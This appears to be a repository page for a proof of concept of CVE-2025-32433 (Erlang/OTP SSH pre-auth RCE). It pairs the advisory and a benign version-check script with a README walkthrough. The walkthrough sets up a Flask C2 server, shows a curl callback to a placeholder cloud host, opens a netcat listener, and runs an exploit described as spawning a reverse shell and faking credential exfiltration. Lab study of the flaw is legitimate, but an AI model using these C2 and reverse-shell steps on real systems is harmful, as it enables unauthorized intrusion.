
CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Associated Vulnerability
Title: Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description: Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround is to disable the SSH server or to block access to it with firewall rules.
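Added defender-side check, not part of the PoC repository: given the OTP version string of a host you administer (for example the contents of `<erlang root>/releases/<major>/OTP_VERSION`, or the `OTP-x.y.z` tag of the installed package), it reports whether that release predates the fixed versions listed above. It assumes that major lines newer than 27 ship the fix and that OTP 24 and older, for which no fixed release is listed, should be treated as affected.

```python
import re
from typing import Optional, Tuple

# Fixed releases taken from the advisory text above. Any release on the
# same major line that sorts below its entry is affected.
FIXED_VERSIONS = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

_VERSION_RE = re.compile(r"(?:OTP-)?(\d+(?:\.\d+)*)")


def parse_otp_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn 'OTP-26.2.5.11' or '27.3.2\\n' into a tuple of ints.

    Returns None when the string carries no version at all.
    """
    match = _VERSION_RE.search(text.strip())
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_affected(version_text: str) -> Optional[bool]:
    """True if this OTP release predates the fix on its major line.

    Returns None when the input cannot be parsed, so callers can tell
    'unknown' apart from 'patched'.
    """
    version = parse_otp_version(version_text)
    if version is None:
        return None
    major = version[0]
    if major > 27:
        return False  # assumption: later major lines were cut after the fix
    fixed = FIXED_VERSIONS.get(major)
    if fixed is None:
        return True  # OTP 24 and older: no fixed release on this page
    # Tuple comparison handles short strings: (26, 2, 5) < (26, 2, 5, 11).
    return version < fixed


if __name__ == "__main__":
    # Constructed sample input standing in for an OTP_VERSION file.
    for sample in ("OTP-26.2.5.10", "26.2.5.11", "27.3.2", "24.3.4.17"):
        print(sample, "affected" if is_affected(sample) else "patched")
```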
Readme
## ⚠️ Ethical Disclaimer

This repository contains code that demonstrates a real CVE (CVE-2025-32433).  
Use it **only in environments where you have explicit authorization**.

Never test this exploit against systems you do not own or manage.  
Unauthorized use is illegal, unethical, and harmful to the cybersecurity community.


Simulated and real PoC for CVE-2025-32433

My homie Chocapikk showed me this found PoC, erling_cve.py. I was intrigued and wanted to test it in a safe environment.

You have two choices with this repo: the safe simulated script and system I lay out below,

or the real deal, erling_cve.py (used in an ethical way, with caution, and only on networks you have permission to test).

Before using this tool to test or run an actual exploit, check out my homie m0usem0use and his Python script for finding targets vulnerable to CVE-2025-32433:

https://github.com/m0usem0use/erl_mouse

------------------------------------------------------

Simulated version of the exploit for CVE-2025-32433

Set Up the C2 Server

Build a Python Flask-based C2; it is useful for bot callbacks or reverse shells.

Run these setup commands on the C2 server:

apt update && apt install python3-pip git -y

sudo apt install python3-flask 

mkdir ~/c2

cd ~/c2

nano c2_server.py    (paste in the c2_server script and edit as needed)

Run it:

python3 c2_server.py

Bots (or test scripts) can call home like this:

curl -X POST http://<linode-ip>:8080/report -d "Bot is online"


Set Up Python venv on Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Create and activate a Python virtual environment:

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Test the Callback

nano test_callback.py    (paste in the test_callback script and edit as needed)

Run the callback:

python3 test_callback.py

You now officially have:

- A working venv
- A live cloud C2
- Functional callback injection

- You need the target/victim machine to have an Erlang process or service exposed (or simulated).

-----------------------------------------------------------------------

What does erling_cve.py do?

- Connects to port 22 of a target IP
- Sends a fake SSH version string
- Sends a crafted packet (likely meant to trigger a vuln, pretending to abuse something like Erlang's undocumented SSH handler or a buffer overflow)
- Triggers a reverse shell back to the attacker IP
- Simulates post-exploitation by running commands like whoami and uname, and a fake "credential exfil" to /tmp/exfil.log

We'll take our found Erlang-ish PoC and:

- Make it functional inside the Kali venv
- Wire it to report to our cloud C2 when the "attack" runs
- Run it ethically and safely within a controlled lab
- Watch it generate /tmp/exfil.log to simulate stolen data

-------------------------

From the Kali machine:

nano poc_erlang_test.py

- paste in poc_erlang_test.py and edit as needed

Open a Listener

In a new terminal, run:

nc -lvnp 4444

Run the PoC:

python poc_erlang_test.py --real
